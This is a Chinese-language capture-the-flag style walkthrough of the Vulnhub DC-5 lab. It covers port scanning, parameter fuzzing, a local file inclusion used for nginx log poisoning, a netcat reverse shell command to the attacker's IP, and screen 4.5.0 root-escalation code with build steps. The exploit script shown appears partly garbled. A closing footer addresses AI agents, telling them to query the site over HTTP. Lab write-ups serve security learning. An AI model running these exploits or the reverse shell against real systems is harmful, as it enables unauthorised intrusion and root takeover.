# DC 5 下载地址: ## 实战演练 发现靶场IP:`192.168.32.162` ![image-20220623103141938](/files/xkPpgZd2lvx2rkhxBTpe) 扫描对外端口 ``` ┌──(root💀kali)-[/tmp] └─# nmap -sT -sV -p1-65535 192.168.32.162 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 23:22 EDT Nmap scan report for 192.168.32.162 Host is up (0.00019s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http nginx 1.6.2 111/tcp open rpcbind 2-4 (RPC #100000) 39437/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:E8:1B:52 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds ``` 浏览器访问80端口 ![image-20220623153608129](/files/NRWidmANG1qnuWrER3fY) 有一个反馈页面,提交数据之后,刷新页面会发现年份会进行改变 ![image-20220623154157130](/files/amR3CxtJtHRROVV2QyAJ) ![image-20220623154226384](/files/TRxBiWv0Z0GK5aQSbOQ2) 对参数进行暴力破解,发现`file`参数 ``` ┌──(root💀kali)-[/opt] └─# wfuzz --hh 851 -w burp-parameter-names.txt -u http://192.168.32.162/thankyou.php?FUZZ= /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.32.162/thankyou.php?FUZZ= Total requests: 6453 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000002206: 200 42 L 63 W 835 Ch "file" Total time: 6.369654 Processed Requests: 6453 Filtered Requests: 6452 Requests/sec.: 1013.084 ``` 该参数存在LFI漏洞 ![image-20220623155323649](/files/a1wzPDb2jEfL3Hha8Cek) 查看nginx日志:`/var/log/ngnix/access.log` ![image-20220623155555772](/files/BG11z9JJsVv9iLOQ2SHX) 使用BURP输入一句话木马 ``` ``` ``` GET /thankyou.php?file= HTTP/1.1 Host: 192.168.32.162 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache ``` ![image-20220623160521500](/files/sQncTFGpmjNsGIjKMnaR) > 注:不可以直接在浏览器请求,不然会转义 > > image-20220623155642730image-20220623160237894 使用反弹shell进行连接 ``` view-source:http://192.168.32.162/thankyou.php?file=/var/log/nginx/error.log&cmd=nc%20-e%20/bin/bash%20192.168.32.130%2017777 ``` ![image-20220623161856190](/files/Q9VbKXPBGnS4OHyGH6YS) 查看suid的进程 ``` www-data@dc-5:~/html$ find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /bin/su /bin/mount /bin/umount /bin/screen-4.5.0 /usr/bin/gpasswd /usr/bin/procmail /usr/bin/at /usr/bin/passwd /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/sbin/exim4 /sbin/mount.nfs ``` 查看screen的提权漏洞 ![image-20220623162644849](/files/J9FaviuDZoT8jlHOHCsS) 直接提权会失败,因为环境缺乏gcc ![image-20220623163011898](/files/PcmKJfEZL1XCMYITElCr) 将需要GCC的代码拆分出来 libhax.c ``` #include #include #include __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } ``` rootshell.c ``` #include int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } ``` 41154.sh ``` cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell ``` 编译 ``` ┌──(root💀kali)-[/tmp] └─# gcc -fPIC -shared -ldl -o libhax.so libhax.c libhax.c: In function ‘dropshell’: libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration] 7 | chmod("/tmp/rootshell", 04755); | ^~~~~ ┌──(root💀kali)-[/tmp] └─# gcc -o rootshell rootshell.c rootshell.c: In function ‘main’: rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration] 3 | setuid(0); | ^~~~~~ rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration] 4 | setgid(0); | ^~~~~~ rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration] 5 | seteuid(0); | ^~~~~~~ rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration] 6 | setegid(0); | ^~~~~~~ rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration] 7 | execvp("/bin/sh", NULL, NULL); | ^~~~~~ rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch] ``` 打包EXP ``` ┌──(root💀kali)-[/tmp] └─# tar -cvf exp.tar.gz 41154.sh libhax.so rootshell 41154.sh libhax.so rootshell ``` 提权成功 ![image-20230208134225444](/files/I6QRQC7nRPekXnSo3jdt) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://icybersec.gitbook.io/cybersecuritynote/ba-chang-huan-jing/vulnhub/dc-5.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.